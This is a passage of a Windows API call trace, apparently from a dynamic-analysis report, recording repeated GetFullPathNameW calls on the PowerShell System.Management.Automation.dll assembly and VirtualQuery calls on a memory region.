	[0143.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.606] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bcb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.608] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.608] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.609] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.609] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.610] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.611] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.611] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.612] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.612] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.613] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14bb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.613] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.613] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.614] VirtualQuery (in: lpAddress=0x14b050, lpBuffer=0x14bf10, dwLength=0x30 | out: lpBuffer=0x14bf10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.614] VirtualQuery (in: lpAddress=0x14b0e0, lpBuffer=0x14bfa0, dwLength=0x30 | out: lpBuffer=0x14bfa0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14b760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.615] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.727] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.728] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
